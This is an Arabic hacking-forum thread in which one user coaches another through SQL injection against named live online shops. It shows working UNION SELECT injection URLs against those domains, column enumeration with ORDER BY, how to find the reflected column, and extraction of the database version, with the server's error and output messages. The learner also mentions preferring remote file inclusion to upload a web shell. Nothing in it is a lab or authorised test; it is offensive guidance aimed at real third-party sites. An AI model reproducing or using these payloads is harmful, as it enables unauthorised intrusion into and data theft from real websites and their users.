استفسار الدرس الرابع.

السلام عليكم.


شباب انا حملت الدروس.


ولاكن وصلت لمشكله .



احد المواقع لقيته مصاب بالـSQL وهذا الرابط

http://www.sharghishop.net/zcat.php?id=1


بعد اضافه ' يعطيك خطا يعني الموقع مصاب.



ولآكن عندما نضع رقم 6 هكذا
http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,3,5,6--


يعطيك رابط صوره. والصوره مش باينه.





يعني الموقع حامي حالو.


______________________




ننتقل لموقع ثاني. وهذا الرابط
http://www.cdbaran.com/zcat.php?id=1


اذا اضفنا ' بيعطيك
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sidimibare/domains/cdbaran.com/public_html/zcat.php on line 393

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/sidimibare/domains/cdbaran.com/public_html/zcat.php on line 394





يعني مش معقوله بكتب 300 سطر .


مثلا 1,2,3,4,5,6,7,8,9,10,11,12,13 صعبه تكتبها لتوصل لـ300




ماهو الحل.

___________


وهذا موقع اخر كل ما تضيف عمود بيعطيك نفس الرساله وهي

The used SELECT statements have a different number of columns



والرابط:
http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29--



_________________

newuser
هلا فيك
بنسبة لي الموقع هذا عندك عدد الاعمدة خطا

يعطيك العافيه خالد.



اي موقع انا حاط 3 روابط كل واحد غير عن الثاني



مع الشكر.

يعطيك العافيه خالد.



اي موقع انا حاط 3 روابط كل واحد غير عن الثاني



مع الشكر.

newuser


هلا فيك
بنسبة لي الموقع


هذا عندك عدد الاعمدة خطا

يعطيك العافيه خالد.


معليش تعبناك.


خل المواقع الي فوق كلها.




ونشوف الموقع هذا.


http://www.sharghishop.net/zcat.php?id=1


عرفنا ان عدد اللاعمده خمسه بالامر order+by

ولاكن اذا حطينا الجمله هذي


http://www.sharghishop.net/zcat.php?...ct+1,2,3,4,5--




وحطينا عدد الاعمده الـ5



يعطيك رساله خطا ولا يبين لك الاعمده المصابه.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 1,2,3,4,5--' at line 1







كل الشكر لك وللمنتدى لما يقدمونه لتقدم الهكر العرب.

هذا موقع اخر.
http://www.cdvdcenter.com/zcat.php?id=1


عرفنا عدد الاعمده 5


ولآكن اذا كتبناها يعطيك مسج خطا.

http://www.cdvdcenter.com/zcat.php?id=-1+union+select+1,2,3,4,5--

يعطيك العافيه خالد.


معليش تعبناك.


خل المواقع الي فوق كلها.




ونشوف الموقع هذا.


http://www.sharghishop.net/zcat.php?id=1


عرفنا ان عدد اللاعمده خمسه بالامر order+by

ولاكن اذا حطينا الجمله هذي


http://www.sharghishop.net/zcat.php?...ct+1,2,3,4,5--




وحطينا عدد الاعمده الـ5



يعطيك رساله خطا ولا يبين لك الاعمده المصابه.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 1,2,3,4,5--' at line 1


ولايهمك ياغالي حاضرين

ابي ترجع الدورة الموجود مرة مريتن وثلاث بيك تخفظها من اسمك عشان تفهم حلو تسهل عليك

واناشرح لك فوق لو كانت مركز
طيب معلينا

http://www.sharghishop.net/zcat.php?...ct+1,2,3,4,5

تقول الموقع هذا عرفنا عدد الاعمدة حلو هو 5 على طول نستخدم الامر
UNION SELECT
لي ظاهر العمود المصاب
هذا الرابط الاول
http://www.sharghishop.net/zcat.php?...ct+1,2,3,4,5
عندك خطا هنا في الحقن (...ct) مدري من وين جبتها هذا او ل مره اشوفه اذكان له فايدة انا لاعلم فيها
ركز

ابيك تضيف UNION SELECT + او مسافه بعد رقم واحد ولاتنسى علامة - بعد علامة يسوي بعدها تضيف 1,2,3,4,5 في نهايه الحقن علامة -- اوكي وصلتك الفكره
يصبح الرابط

كود PHP:

http://www.sharghishop.net/zcat.php?id=-1 UNION SELECT 1,2,3,4,5-- 


امممم الرساله لي تطلع لك
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
يقولك خطا في الموقع sql
حلو

انت هنا 100%100

كود PHP:

http://www.cdvdcenter.com/zcat.php?id=-1+union+select+1,2,3,4,5-- 


يطلع المسج
The used SELECT statements have a different number of columns

انت معليك من المسج انت عليك تبحث عن العمود المصاب
تركز في الصفحة 100%تبحث تشوف ممكن المبرمج مخفي العمود
مثل
الان تفتح معاك الصفحة واناشرح لك فوق
مافي اي مشكلة بس تروح لي نصف الصفحة
كليك يمين عرض معلومات الصفحة او خصائص الصفحة تطلع نافذة تلاحظ فوق
مكتوب 3 :: Sharghishop.com :: يعني رقم3 هو العمودالمصاب لي نكمل عليه الحقن
نفس لي في الصورة


للتاكيد
استخرح اصدار القاعدة بدل في رقم 3
version()
هذا الرابط

كود PHP:

http://www.sharghishop.net/zcat.php?id=-1 union select 1,2,
version(),4,5-- 


مافي اي مشكلة بس تروح لي نصف الصفحة
كليك يمين عرض معلومات الصفحة او خصائص الصفحة تطلع نافذة تلاحظ فوق
تغير صح طلع اصدار القاعدة

:d معليش تعبناك ياخالد.


كلآمك صحيح .



يعني الخطاء عندي اني ما ضغطت عرض خصائص الصفحه




طيب طلبنا الاصدار وعطانا .

5.0.51a-community :: Sharghishop.com ::



وش الخطوه الثانيه.






ياخي السكيول متعبه وخايسه.




يازين الريموت فايل انلكود ارفع الشل واشتغل.

خخخ.



كل الشكر.

newuser
لا عادي ولايهمك يمكن انت تابع الدورات لي في المنتدي في قسم الدورات تستفيد كثير
ولكن انا بسالك
فايل انلكود في موقع مصاب وكم نسبة اناسالت واحد يقول الان نسبة قليله وانا والله ماعلم
انا في نتظارك

يعطيك العافيه اخ خالد.



الحقيقه صحيح الثغره زي مايقلون انقرضه.

وقليل المواقع المصابه او نادر.

بارك الله فيك مشكور ياغالي

شكراااااااااااااااااااا